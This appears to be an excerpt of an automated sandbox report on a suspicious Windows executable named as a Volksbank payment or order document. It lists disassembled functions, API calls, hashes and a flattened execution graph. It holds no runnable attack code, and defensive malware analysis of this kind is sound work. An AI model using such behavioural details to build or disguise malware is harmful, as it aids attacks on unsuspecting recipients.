                                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                                          • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                          Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3669619086-0
                                                                                                                                                                                                                                          • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                          Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                                                                                          • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1961120804-0
                                                                                                                                                                                                                                          • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                                                                                                                          Signature Coverage:0.5%
                                                                                                                                                                                                                                          Total number of Nodes:870
                                                                                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                                                                                          execution_graph 34075 40fc40 70 API calls 34248 403640 21 API calls 34076 427fa4 42 API calls 34249 412e43 _endthreadex 34250 425115 76 API calls 34251 43fe40 133 API calls 34079 425115 83 API calls 34080 401445 memcpy memcpy DialogBoxParamA 34081 440c40 34 API calls 34083 411853 RtlInitializeCriticalSection memset 34084 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34257 40a256 13 API calls 34259 432e5b 17 API calls 34261 43fa5a 20 API calls 34086 401060 41 API calls 34264 427260 CloseHandle memset memset 33140 410c68 FindResourceA 33141 410c81 SizeofResource 33140->33141 33143 410cae 33140->33143 33142 410c92 LoadResource 33141->33142 33141->33143 33142->33143 33144 410ca0 LockResource 33142->33144 33144->33143 34266 405e69 14 API calls 34091 433068 15 API calls 34268 414a6d 18 API calls 34269 43fe6f 134 API calls 34093 424c6d 15 API calls 34270 426741 19 API calls 34095 440c70 17 API calls 34096 443c71 44 API calls 34099 427c79 24 API calls 34273 416e7e memset 34103 42800b 47 API calls 34104 425115 85 API calls 34276 41960c 61 API calls 34105 43f40c 122 API calls 34108 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34109 43f81a 20 API calls 34111 414c20 memset memset 34112 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34280 414625 18 API calls 34281 404225 modf 34282 403a26 strlen WriteFile 34284 40422a 12 API calls 34288 427632 memset memset memcpy 34289 40ca30 59 API calls 34290 404235 26 API calls 34113 42ec34 61 API calls 34114 425115 76 API calls 34291 425115 77 API calls 34293 44223a 38 API calls 34120 43183c 112 API calls 34294 44b2c5 _onexit __dllonexit 34299 42a6d2 memcpy 34122 405cda 65 API calls 34307 43fedc 138 API calls 34308 4116e1 16 API calls 34125 4244e6 19 API calls 34127 42e8e8 127 API calls 34128 4118ee RtlLeaveCriticalSection 34313 43f6ec 22 API calls 34130 425115 119 API calls 33130 410cf3 EnumResourceNamesA 34316 4492f0 memcpy memcpy 34318 43fafa 18 API calls 34319 4342f9 15 API calls 34131 4144fd 19 API calls 34321 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34322 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34325 443a84 _mbscpy 34327 43f681 17 API calls 34134 404487 22 API calls 34329 415e8c 16 API calls 34138 411893 RtlDeleteCriticalSection 34139 41a492 42 API calls 34333 403e96 34 API calls 34334 410e98 memset SHGetPathFromIDList SendMessageA 34141 426741 109 API calls 34142 4344a2 18 API calls 34143 4094a2 10 API calls 34337 4116a6 15 API calls 34338 43f6a4 17 API calls 34339 440aa3 20 API calls 34341 427430 45 API calls 34146 4090b0 7 API calls 34147 4148b0 15 API calls 34149 4118b4 RtlEnterCriticalSection 34150 4014b7 CreateWindowExA 34151 40c8b8 19 API calls 34153 4118bf RtlTryEnterCriticalSection 34346 42434a 18 API calls 34348 405f53 12 API calls 34161 43f956 59 API calls 34163 40955a 17 API calls 34164 428561 36 API calls 34165 409164 7 API calls 34352 404366 19 API calls 34356 40176c ExitProcess 34359 410777 42 API calls 34170 40dd7b 51 API calls 34171 425d7c 16 API calls 34361 43f6f0 25 API calls 34362 42db01 22 API calls 34172 412905 15 API calls 34363 403b04 54 API calls 34364 405f04 SetDlgItemTextA GetDlgItemTextA 34365 44b301 ??3@YAXPAX 34368 4120ea 14 API calls 34369 40bb0a 8 API calls 34371 413f11 strcmp 34176 434110 17 API calls 34179 425115 108 API calls 34372 444b11 _onexit 34181 425115 76 API calls 34184 429d19 10 API calls 34375 444b1f __dllonexit 34376 409f20 _strcmpi 34186 42b927 31 API calls 34379 433f26 19 API calls 34380 44b323 FreeLibrary 34381 427f25 46 API calls 34382 43ff2b 17 API calls 34383 43fb30 19 API calls 34193 414d36 16 API calls 34195 40ad38 7 API calls 34385 433b38 16 API calls 34066 44b33b 34067 44b344 ??3@YAXPAX 34066->34067 34068 44b34b 34066->34068 34067->34068 34069 44b354 ??3@YAXPAX 34068->34069 34070 44b35b 34068->34070 34069->34070 34071 44b364 ??3@YAXPAX 34070->34071 34072 44b36b 34070->34072 34071->34072 34073 44b374 ??3@YAXPAX 34072->34073 34074 44b37b 34072->34074 34073->34074 34199 426741 21 API calls 34200 40c5c3 125 API calls 34202 43fdc5 17 API calls 34386 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34205 4161cb memcpy memcpy memcpy memcpy 33145 44b3cf 33146 44b3e6 33145->33146 33151 44b454 33145->33151 33146->33151 33158 44b40e GetModuleHandleA 33146->33158 33147 44b45d GetModuleHandleA 33152 44b467 33147->33152 33148 44b49a 33171 44b49f 33148->33171 33151->33147 33151->33148 33151->33152 33152->33151 33153 44b487 GetProcAddress 33152->33153 33153->33151 33154 44b405 33154->33151 33154->33152 33155 44b428 GetProcAddress 33154->33155 33155->33151 33156 44b435 VirtualProtect 33155->33156 33156->33151 33157 44b444 VirtualProtect 33156->33157 33157->33151 33159 44b417 33158->33159 33168 44b454 33158->33168 33190 44b42b GetProcAddress 33159->33190 33161 44b45d GetModuleHandleA 33167 44b467 33161->33167 33162 44b49a 33164 44b49f 776 API calls 33162->33164 33163 44b41c 33165 44b428 GetProcAddress 33163->33165 33163->33168 33164->33162 33166 44b435 VirtualProtect 33165->33166 33165->33168 33166->33168 33169 44b444 VirtualProtect 33166->33169 33167->33168 33170 44b487 GetProcAddress 33167->33170 33168->33161 33168->33162 33168->33167 33169->33168 33170->33168 33172 444c4a 33171->33172 33173 444c56 GetModuleHandleA 33172->33173 33174 444c68 __set_app_type __p__fmode __p__commode 33173->33174 33176 444cfa 33174->33176 33177 444d02 __setusermatherr 33176->33177 33178 444d0e 33176->33178 33177->33178 33199 444e22 _controlfp 33178->33199 33180 444d13 _initterm __getmainargs _initterm 33181 444d6a GetStartupInfoA 33180->33181 33183 444d9e GetModuleHandleA 33181->33183 33200 40cf44 33183->33200 33187 444dcf _cexit 33189 444e04 33187->33189 33188 444dc8 exit 33188->33187 33189->33148 33191 44b435 VirtualProtect 33190->33191 33192 44b454 33190->33192 33191->33192 33193 44b444 VirtualProtect 33191->33193 33194 44b45d GetModuleHandleA 33192->33194 33195 44b49a 33192->33195 33193->33192 33198 44b467 33194->33198 33196 44b49f 776 API calls 33195->33196 33196->33195 33197 44b487 GetProcAddress 33197->33198 33198->33192 33198->33197 33199->33180 33251 404a99 LoadLibraryA 33200->33251 33202 40cf60 33239 40cf64 33202->33239 33259 410d0e 33202->33259 33204 40cf6f 33263 40ccd7 ??2@YAPAXI 33204->33263 33206 40cf9b 33277 407cbc 33206->33277 33211 40cfc4 33295 409825 memset 33211->33295 33212 40cfd8 33300 4096f4 memset 33212->33300 33217 40d181 ??3@YAXPAX 33219 40d1b3 33217->33219 33220 40d19f DeleteObject 33217->33220 33218 407e30 _strcmpi 33221 40cfee 33218->33221 33324 407948 free free 33219->33324 33220->33219 33223 40cff2 RegDeleteKeyA 33221->33223 33224 40d007 EnumResourceTypesA 33221->33224 33223->33217 33226 40d047 33224->33226 33227 40d02f MessageBoxA 33224->33227 33225 40d1c4 33325 4080d4 free 33225->33325 33228 40d0a0 CoInitialize 33226->33228 33305 40ce70 33226->33305 33227->33217 33322 40cc26 strncat memset RegisterClassA CreateWindowExA 33228->33322 33232 40d1cd 33326 407948 free free 33232->33326 33234 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33323 40c256 PostMessageA 33234->33323 33236 40d061 ??3@YAXPAX 33236->33219 33240 40d084 DeleteObject 33236->33240 33237 40d09e 33237->33228 33239->33187 33239->33188 33240->33219 33243 40d0f9 GetMessageA 33244 40d17b CoUninitialize 33243->33244 33245 40d10d 33243->33245 33244->33217 33246 40d113 TranslateAccelerator 33245->33246 33248 40d145 IsDialogMessage 33245->33248 33249 40d139 IsDialogMessage 33245->33249 33246->33245 33247 40d16d GetMessageA 33246->33247 33247->33244 33247->33246 33248->33247 33250 40d157 TranslateMessage DispatchMessageA 33248->33250 33249->33247 33249->33248 33250->33247 33252 404ac4 GetProcAddress 33251->33252 33253 404aec 33251->33253 33254 404ad4 33252->33254 33255 404add FreeLibrary 33252->33255 33257 404b13 33253->33257 33258 404afc MessageBoxA 33253->33258 33254->33255 33255->33253 33256 404ae8 33255->33256 33256->33253 33257->33202 33258->33202 33260 410d17 LoadLibraryA 33259->33260 33261 410d3c 33259->33261 33260->33261 33262 410d2b GetProcAddress 33260->33262 33261->33204 33262->33261 33264 40cd08 ??2@YAPAXI 33263->33264 33266 40cd26 33264->33266 33267 40cd2d 33264->33267 33334 404025 6 API calls 33266->33334 33269 40cd66 33267->33269 33270 40cd59 DeleteObject 33267->33270 33327 407088 33269->33327 33270->33269 33272 40cd6b 33330 4019b5 33272->33330 33275 4019b5 strncat 33276 40cdbf _mbscpy 33275->33276 33276->33206 33336 407948 free free 33277->33336 33279 407cf7 33282 407a1f malloc memcpy free free 33279->33282 33283 407ddc 33279->33283 33285 407d7a free 33279->33285 33290 407e04 33279->33290 33340 40796e 7 API calls 33279->33340 33341 406f30 33279->33341 33282->33279 33283->33290 33349 407a1f 33283->33349 33285->33279 33337 407a55 33290->33337 33291 407e30 33292 407e57 33291->33292 33293 407e38 33291->33293 33292->33211 33292->33212 33293->33292 33294 407e41 _strcmpi 33293->33294 33294->33292 33294->33293 33355 4097ff 33295->33355 33297 409854 33360 409731 33297->33360 33301 4097ff 3 API calls 33300->33301 33302 409723 33301->33302 33380 40966c 33302->33380 33394 4023b2 33305->33394 33311 40ced3 33483 40cdda 7 API calls 33311->33483 33312 40cece 33315 40cf3f 33312->33315 33435 40c3d0 memset GetModuleFileNameA strrchr 33312->33435 33315->33236 33315->33237 33318 40ceed 33462 40affa 33318->33462 33322->33234 33323->33243 33324->33225 33325->33232 33326->33239 33335 406fc7 memset _mbscpy 33327->33335 33329 40709f CreateFontIndirectA 33329->33272 33331 4019e1 33330->33331 33332 4019c2 strncat 33331->33332 33333 4019e5 memset LoadIconA 33331->33333 33332->33331 33333->33275 33334->33267 33335->33329 33336->33279 33338 407a65 33337->33338 33339 407a5b free 33337->33339 33338->33291 33339->33338 33340->33279 33342 406f37 malloc 33341->33342 33343 406f7d 33341->33343 33345 406f73 33342->33345 33346 406f58 33342->33346 33343->33279 33345->33279 33347 406f6c free 33346->33347 33348 406f5c memcpy 33346->33348 33347->33345 33348->33347 33350 407a38 33349->33350 33351 407a2d free 33349->33351 33352 406f30 3 API calls 33350->33352 33353 407a43 33351->33353 33352->33353 33354 40796e 7 API calls 33353->33354 33354->33290 33371 406f96 GetModuleFileNameA 33355->33371 33357 409805 strrchr 33358 409814 33357->33358 33359 409817 _mbscat 33357->33359 33358->33359 33359->33297 33372 44b090 33360->33372 33365 40930c 3 API calls 33366 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33365->33366 33367 4097c5 LoadStringA 33366->33367 33368 4097db 33367->33368 33368->33367 33370 4097f3 33368->33370 33379 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33368->33379 33370->33217 33371->33357 33373 40973e _mbscpy _mbscpy 33372->33373 33374 40930c 33373->33374 33375 44b090 33374->33375 33376 409319 memset GetPrivateProfileStringA 33375->33376 33377 409374 33376->33377 33378 409364 WritePrivateProfileStringA 33376->33378 33377->33365 33378->33377 33379->33368 33390 406f81 GetFileAttributesA 33380->33390 33382 409675 33383 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33382->33383 33389 4096ee 33382->33389 33391 409278 GetPrivateProfileStringA 33383->33391 33385 4096c9 33392 409278 GetPrivateProfileStringA 33385->33392 33387 4096da 33393 409278 GetPrivateProfileStringA 33387->33393 33389->33218 33390->33382 33391->33385 33392->33387 33393->33389 33485 409c1c 33394->33485 33397 401e69 memset 33524 410dbb 33397->33524 33400 401ec2 33555 4070e3 strlen _mbscat _mbscpy _mbscat 33400->33555 33401 401ed4 33539 406f81 GetFileAttributesA 33401->33539 33404 401ee6 strlen strlen 33406 401f15 33404->33406 33407 401f28 33404->33407 33556 4070e3 strlen _mbscat _mbscpy _mbscat 33406->33556 33540 406f81 GetFileAttributesA 33407->33540 33410 401f35 33541 401c31 33410->33541 33413 401f75 33553 410a9c RegOpenKeyExA 33413->33553 33415 401c31 7 API calls 33415->33413 33416 401f91 33417 402187 33416->33417 33418 401f9c memset 33416->33418 33420 402195 ExpandEnvironmentStringsA 33417->33420 33421 4021a8 _strcmpi 33417->33421 33557 410b62 RegEnumKeyExA 33418->33557 33554 406f81 GetFileAttributesA 33420->33554 33421->33311 33421->33312 33423 40217e RegCloseKey 33423->33417 33424 401fd9 atoi 33425 401fef memset memset sprintf 33424->33425 33428 401fc9 33424->33428 33558 410b1e 33425->33558 33428->33423 33428->33424 33429 402165 33428->33429 33430 406f81 GetFileAttributesA 33428->33430 33431 402076 memset memset strlen strlen 33428->33431 33432 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33432 33433 4020dd strlen strlen 33428->33433 33434 402167 _mbscpy 33428->33434 33565 410b62 RegEnumKeyExA 33428->33565 33429->33423 33430->33428 33431->33428 33432->33428 33433->33428 33434->33423 33436 40c422 33435->33436 33437 40c425 _mbscat _mbscpy _mbscpy 33435->33437 33436->33437 33438 40c49d 33437->33438 33439 40c502 GetWindowPlacement 33438->33439 33440 40c512 33438->33440 33439->33440 33441 40c538 33440->33441 33586 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33440->33586 33579 409b31 33441->33579 33445 40ba28 33446 40ba87 33445->33446 33452 40ba3c 33445->33452 33589 406c62 LoadCursorA SetCursor 33446->33589 33448 40ba8c 33590 404734 33448->33590 33598 403c16 33448->33598 33674 404785 33448->33674 33677 410a9c RegOpenKeyExA 33448->33677 33678 4107f1 33448->33678 33449 40ba43 _mbsicmp 33449->33452 33450 40baa0 33451 407e30 _strcmpi 33450->33451 33455 40bab0 33451->33455 33452->33446 33452->33449 33681 40b5e5 10 API calls 33452->33681 33453 40bafa SetCursor 33453->33318 33455->33453 33456 40baf1 qsort 33455->33456 33456->33453 34041 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33462->34041 33464 40b00e 33465 40b016 33464->33465 33466 40b01f GetStdHandle 33464->33466 34042 406d1a CreateFileA 33465->34042 33468 40b01c 33466->33468 33469 40b035 33468->33469 33470 40b12d 33468->33470 34043 406c62 LoadCursorA SetCursor 33469->34043 34047 406d77 9 API calls 33470->34047 33473 40b136 33484 40c580 28 API calls 33473->33484 33474 40b042 33475 40b087 33474->33475 33481 40b0a1 33474->33481 34044 40a57c strlen WriteFile 33474->34044 33475->33481 34045 40a699 12 API calls 33475->34045 33478 40b0d6 33479 40b116 CloseHandle 33478->33479 33480 40b11f SetCursor 33478->33480 33479->33480 33480->33473 33481->33478 34046 406d77 9 API calls 33481->34046 33483->33312 33484->33315 33497 409a32 33485->33497 33488 409c80 memcpy memcpy 33489 409cda 33488->33489 33489->33488 33490 409d18 ??2@YAPAXI ??2@YAPAXI 33489->33490 33494 408db6 12 API calls 33489->33494 33491 409d54 ??2@YAPAXI 33490->33491 33493 409d8b 33490->33493 33491->33493 33507 409b9c 33493->33507 33494->33489 33496 4023c1 33496->33397 33498 409a44 33497->33498 33499 409a3d ??3@YAXPAX 33497->33499 33500 409a52 33498->33500 33501 409a4b ??3@YAXPAX 33498->33501 33499->33498 33502 409a63 33500->33502 33503 409a5c ??3@YAXPAX 33500->33503 33501->33500 33504 409a83 ??2@YAPAXI ??2@YAPAXI 33502->33504 33505 409a73 ??3@YAXPAX 33502->33505 33506 409a7c ??3@YAXPAX 33502->33506 33503->33502 33504->33488 33505->33506 33506->33504 33508 407a55 free 33507->33508 33509 409ba5 33508->33509 33510 407a55 free 33509->33510 33511 409bad 33510->33511 33512 407a55 free 33511->33512 33513 409bb5 33512->33513 33514 407a55 free 33513->33514 33515 409bbd 33514->33515 33516 407a1f 4 API calls 33515->33516 33517 409bd0 33516->33517 33518 407a1f 4 API calls 33517->33518 33519 409bda 33518->33519 33520 407a1f 4 API calls 33519->33520 33521 409be4 33520->33521 33522 407a1f 4 API calls 33521->33522 33523 409bee 33522->33523 33523->33496 33525 410d0e 2 API calls 33524->33525 33526 410dca 33525->33526 33527 410dfd memset 33526->33527 33566 4070ae 33526->33566 33528 410e1d 33527->33528 33569 410a9c RegOpenKeyExA 33528->33569 33531 401e9e strlen strlen 33531->33400 33531->33401 33533 410e4a 33534 410e7f _mbscpy 33533->33534 33570 410d3d _mbscpy 33533->33570 33534->33531 33536 410e5b 33571 410add RegQueryValueExA 33536->33571 33538 410e73 RegCloseKey 33538->33534 33539->33404 33540->33410 33572 410a9c RegOpenKeyExA 33541->33572 33543 401c4c 33544 401cad 33543->33544 33573 410add RegQueryValueExA 33543->33573 33544->33413 33544->33415 33546 401c6a 33547 401c71 strchr 33546->33547 33548 401ca4 RegCloseKey 33546->33548 33547->33548 33549 401c85 strchr 33547->33549 33548->33544 33549->33548 33550 401c94 33549->33550 33574 406f06 strlen 33550->33574 33552 401ca1 33552->33548 33553->33416 33554->33421 33555->33401 33556->33407 33557->33428 33577 410a9c RegOpenKeyExA 33558->33577 33560 410b34 33561 410b5d 33560->33561 33578 410add RegQueryValueExA 33560->33578 33561->33428 33563 410b4c RegCloseKey 33563->33561 33565->33428 33567 4070bd GetVersionExA 33566->33567 33568 4070ce 33566->33568 33567->33568 33568->33527 33568->33531 33569->33533 33570->33536 33571->33538 33572->33543 33573->33546 33575 406f17 33574->33575 33576 406f1a memcpy 33574->33576 33575->33576 33576->33552 33577->33560 33578->33563 33580 409b40 33579->33580 33582 409b4e 33579->33582 33587 409901 memset SendMessageA 33580->33587 33583 409b99 33582->33583 33584 409b8b 33582->33584 33583->33445 33588 409868 SendMessageA 33584->33588 33586->33441 33587->33582 33588->33583 33589->33448 33591 404785 FreeLibrary 33590->33591 33592 40473b LoadLibraryA 33591->33592 33593 40474c GetProcAddress 33592->33593 33594 40476e 33592->33594 33593->33594 33595 404764 33593->33595 33596 404781 33594->33596 33597 404785 FreeLibrary 33594->33597 33595->33594 33596->33450 33597->33596 33599 4107f1 FreeLibrary 33598->33599 33600 403c30 LoadLibraryA 33599->33600 33601 403c74 33600->33601 33602 403c44 GetProcAddress 33600->33602 33603 4107f1 FreeLibrary 33601->33603 33602->33601 33604 403c5e 33602->33604 33605 403c7b 33603->33605 33604->33601 33607 403c6b 33604->33607 33606 404734 3 API calls 33605->33606 33608 403c86 33606->33608 33607->33605 33682 4036e5 33608->33682 33611 4036e5 27 API calls 33612 403c9a 33611->33612 33613 4036e5 27 API calls 33612->33613 33614 403ca4 33613->33614 33615 4036e5 27 API calls 33614->33615 33616 403cae 33615->33616 33694 4085d2 33616->33694 33624 403ce5 33625 403cf7 33624->33625 33877 402bd1 40 API calls 33624->33877 33742 410a9c RegOpenKeyExA 33625->33742 33628 403d0a 33629 403d1c 33628->33629 33878 402bd1 40 API calls 33628->33878 33743 402c5d 33629->33743 33633 4070ae GetVersionExA 33634 403d31 33633->33634 33761 410a9c RegOpenKeyExA 33634->33761 33636 403d51 33637 403d61 33636->33637 33879 402b22 47 API calls 33636->33879 33762 410a9c RegOpenKeyExA 33637->33762 33640 403d87 33641 403d97 33640->33641 33880 402b22 47 API calls 33640->33880 33763 410a9c RegOpenKeyExA 33641->33763 33644 403dbd 33645 403dcd 33644->33645 33881 402b22 47 API calls 33644->33881 33764 410808 33645->33764 33649 404785 FreeLibrary 33650 403de8 33649->33650 33768 402fdb 33650->33768 33653 402fdb 34 API calls 33654 403e00 33653->33654 33784 4032b7 33654->33784 33663 403e3b 33665 403e73 33663->33665 33666 403e46 _mbscpy 33663->33666 33831 40fb00 33665->33831 33883 40f334 334 API calls 33666->33883 33675 4047a3 33674->33675 33676 404799 FreeLibrary 33674->33676 33675->33450 33676->33675 33677->33450 33679 410807 33678->33679 33680 4107fc FreeLibrary 33678->33680 33679->33450 33680->33679 33681->33452 33683 4036fb 33682->33683 33686 4037c5 33682->33686 33884 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 